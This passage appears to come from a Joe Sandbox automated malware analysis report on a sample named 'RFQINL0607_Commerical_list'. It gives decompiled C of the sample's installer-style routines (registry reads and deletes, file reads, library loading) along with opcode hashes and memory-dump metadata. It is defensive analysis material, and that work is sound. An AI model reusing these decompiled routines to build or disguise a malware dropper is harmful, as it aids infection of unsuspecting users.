                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 167947723-0
                                                                                                                                                                                  • Opcode ID: feffbb95c748fa3e19911c27a8308bde2e8847e58ff8f3d62bd5e7d38f82a1d5
                                                                                                                                                                                  • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                                                                                                                                                  • Opcode Fuzzy Hash: feffbb95c748fa3e19911c27a8308bde2e8847e58ff8f3d62bd5e7d38f82a1d5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                                  			E100027E8(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004040 != 0 && E10002767(_a4) == 0) {
					 *0x10004044 = _t106;
					if( *0x1000403c != 0) {
						_t106 =  *0x1000403c;
					} else {
						E10002D20(E10002761(), __ecx);
						 *0x1000403c = _t106;
					}
				}
				_t31 = E100027A3(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002797();
					_t81 = _a4;
					_t90 =  *0x10004048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004048 = _t81;
					E10002791();
					_t36 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x1000401c = _t36;
					 *0x10004020 = _t90;
					if( *0x10004040 != 0 && E10002767( *0x10004048) == 0) {
						 *0x1000403c = _t107;
						_t107 =  *0x10004044;
					}
					_t91 =  *0x10004048;
					_a4 = _t91;
					 *0x10004048 =  *((intOrPtr*)(E10002797() + _t91));
					_t40 = E10002775(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E100027A3(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E100027AE() + _a4 + _v8);
							_push(E100027B8());
							if( *0x10004040 <= 0 || E10002767(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004048 == 0) {
						 *0x1000403c = 0;
					}
					_t94 = _a4 + E100027AE();
					 *(E100027BC() + _t94) =  *0x1000401c;
					 *((intOrPtr*)(E100027C0() + _t94)) =  *0x10004020;
					E100027D0(_a4);
					if(E10002783() != 0) {
						 *0x10004058 = GetLastError();
					}
					return _a4;
				}
				_push(E100027AE() + _a4);
				_t65 = E100027B4();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E100027C0();
				_t100 = E100027BC();
				_t103 = E100027B8();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}


























                                                                                                                                                                                  0x100027f8
                                                                                                                                                                                  0x10002809
                                                                                                                                                                                  0x10002816
                                                                                                                                                                                  0x1000282a
                                                                                                                                                                                  0x10002818
                                                                                                                                                                                  0x1000281d
                                                                                                                                                                                  0x10002822
                                                                                                                                                                                  0x10002822
                                                                                                                                                                                  0x10002816
                                                                                                                                                                                  0x10002833
                                                                                                                                                                                  0x10002838
                                                                                                                                                                                  0x1000283e
                                                                                                                                                                                  0x10002882
                                                                                                                                                                                  0x10002882
                                                                                                                                                                                  0x10002887
                                                                                                                                                                                  0x1000288c
                                                                                                                                                                                  0x10002892
                                                                                                                                                                                  0x10002894
                                                                                                                                                                                  0x1000289a
                                                                                                                                                                                  0x100028a7
                                                                                                                                                                                  0x100028a9
                                                                                                                                                                                  0x100028ae
                                                                                                                                                                                  0x100028bb
                                                                                                                                                                                  0x100028ce
                                                                                                                                                                                  0x100028d4
                                                                                                                                                                                  0x100028da
                                                                                                                                                                                  0x100028db
                                                                                                                                                                                  0x100028e1
                                                                                                                                                                                  0x100028ed
                                                                                                                                                                                  0x100028f3
                                                                                                                                                                                  0x100028fb
                                                                                                                                                                                  0x100028fc
                                                                                                                                                                                  0x100028ff
                                                                                                                                                                                  0x1000290a
                                                                                                                                                                                  0x1000290c
                                                                                                                                                                                  0x10002918
                                                                                                                                                                                  0x1000291e
                                                                                                                                                                                  0x10002926
                                                                                                                                                                                  0x10002952
                                                                                                                                                                                  0x10002953
                                                                                                                                                                                  0x10002959
                                                                                                                                                                                  0x10002959
                                                                                                                                                                                  0x10002960
                                                                                                                                                                                  0x10002936
                                                                                                                                                                                  0x10002936
                                                                                                                                                                                  0x10002937
                                                                                                                                                                                  0x10002945
                                                                                                                                                                                  0x1000294e
                                                                                                                                                                                  0x1000294e
                                                                                                                                                                                  0x10002926
                                                                                                                                                                                  0x1000290a
                                                                                                                                                                                  0x10002969
                                                                                                                                                                                  0x1000296b
                                                                                                                                                                                  0x1000296b
                                                                                                                                                                                  0x1000297d
                                                                                                                                                                                  0x1000298a
                                                                                                                                                                                  0x10002998
                                                                                                                                                                                  0x1000299e
                                                                                                                                                                                  0x100029ac
                                                                                                                                                                                  0x100029b4
                                                                                                                                                                                  0x100029b4
                                                                                                                                                                                  0x100029c2
                                                                                                                                                                                  0x100029c2
                                                                                                                                                                                  0x10002849
                                                                                                                                                                                  0x1000284a
                                                                                                                                                                                  0x1000284f
                                                                                                                                                                                  0x10002853
                                                                                                                                                                                  0x10002858
                                                                                                                                                                                  0x1000286c
                                                                                                                                                                                  0x1000286d
                                                                                                                                                                                  0x1000286e
                                                                                                                                                                                  0x10002870
                                                                                                                                                                                  0x10002875
                                                                                                                                                                                  0x10002877
                                                                                                                                                                                  0x10002877
                                                                                                                                                                                  0x1000287a
                                                                                                                                                                                  0x10002880
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                                                  • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                  • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E00402410(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B44(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402A3A(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x34) = 0x400;
					_t21 = RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x34); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405C8D(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42e488 =  *0x42e488 +  *(_t37 - 4);
				return 0;
			}









                                                                                                                                                                                  0x00402410
                                                                                                                                                                                  0x00402410
                                                                                                                                                                                  0x00402415
                                                                                                                                                                                  0x0040241c
                                                                                                                                                                                  0x0040241e
                                                                                                                                                                                  0x00402425
                                                                                                                                                                                  0x00402427
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x0040242d
                                                                                                                                                                                  0x00402430
                                                                                                                                                                                  0x00402440
                                                                                                                                                                                  0x0040244b
                                                                                                                                                                                  0x0040247b
                                                                                                                                                                                  0x0040247b
                                                                                                                                                                                  0x0040247d
                                                                                                                                                                                  0x0040244d
                                                                                                                                                                                  0x00402451
                                                                                                                                                                                  0x0040246a
                                                                                                                                                                                  0x00402471
                                                                                                                                                                                  0x00402474
                                                                                                                                                                                  0x00402453
                                                                                                                                                                                  0x00402456
                                                                                                                                                                                  0x00402461
                                                                                                                                                                                  0x004024d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402456
                                                                                                                                                                                  0x00402451
                                                                                                                                                                                  0x004024d7
                                                                                                                                                                                  0x004024d8
                                                                                                                                                                                  0x004024d8
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,00000135,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq51C5.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                  • Opcode ID: 6e01978ae020aba77f28766b1e60078385e92366a95d54457070772f5d71da16
                                                                                                                                                                                  • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e01978ae020aba77f28766b1e60078385e92366a95d54457070772f5d71da16
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42e430;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42dbec =  *0x42dbec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42dbec, 0x7530,  *0x42dbd4), 0); // executed
					}
				}
				return 0;
			}











                                                                                                                                                                                  0x0040138a
                                                                                                                                                                                  0x004013fa
                                                                                                                                                                                  0x0040139b
                                                                                                                                                                                  0x004013a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004013a2
                                                                                                                                                                                  0x004013a3
                                                                                                                                                                                  0x004013ad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00401404
                                                                                                                                                                                  0x004013b0
                                                                                                                                                                                  0x004013b7
                                                                                                                                                                                  0x004013bd
                                                                                                                                                                                  0x004013be
                                                                                                                                                                                  0x004013c0
                                                                                                                                                                                  0x004013c2
                                                                                                                                                                                  0x004013b9
                                                                                                                                                                                  0x004013b9
                                                                                                                                                                                  0x004013ba
                                                                                                                                                                                  0x004013ba
                                                                                                                                                                                  0x004013c9
                                                                                                                                                                                  0x004013cb
                                                                                                                                                                                  0x004013f4
                                                                                                                                                                                  0x004013f4
                                                                                                                                                                                  0x004013c9
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                  • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                                                                                  • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                                                                                                  • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00402308(void* __ebx) {
				char* _t6;
				void* _t11;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402A3A(0x22);
					_t18 =  *(_t23 - 0x18) & 0x00000002;
					__eflags =  *(_t23 - 0x18) & 0x00000002;
					_t19 = E00402A7A(E00402B2F( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18);
					goto L4;
				} else {
					_t11 = E00402B44(_t26, 2); // executed
					_t22 = _t11;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueA(_t22, E00402A3A(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                                                                                                                                                  0x00402308
                                                                                                                                                                                  0x00402308
                                                                                                                                                                                  0x0040230b
                                                                                                                                                                                  0x0040233a
                                                                                                                                                                                  0x00402342
                                                                                                                                                                                  0x00402342
                                                                                                                                                                                  0x00402355
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040230d
                                                                                                                                                                                  0x0040230f
                                                                                                                                                                                  0x00402314
                                                                                                                                                                                  0x00402318
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x0040231e
                                                                                                                                                                                  0x0040232e
                                                                                                                                                                                  0x00402330
                                                                                                                                                                                  0x00402357
                                                                                                                                                                                  0x00402359
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040235f
                                                                                                                                                                                  0x00402359
                                                                                                                                                                                  0x00402318
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,00000135,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 849931509-0
                                                                                                                                                                                  • Opcode ID: fac7dbd61b22557a21332043f2b51aa327aa1cbd5cec1a67e7bfce38fb21cccf
                                                                                                                                                                                  • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                                                                                                                  • Opcode Fuzzy Hash: fac7dbd61b22557a21332043f2b51aa327aa1cbd5cec1a67e7bfce38fb21cccf
                                                                                                                                                                                  • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004060C8(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409240);
				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x409244));
				}
				_t5 = E0040605A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                                  0x004060d0
                                                                                                                                                                                  0x004060d3
                                                                                                                                                                                  0x004060da
                                                                                                                                                                                  0x004060e2
                                                                                                                                                                                  0x004060ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004060f5
                                                                                                                                                                                  0x004060e5
                                                                                                                                                                                  0x004060ec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004060fd
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                    • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                                                                                                    • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                                                                                                    • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2547128583-0
                                                                                                                                                                                  • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                  • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
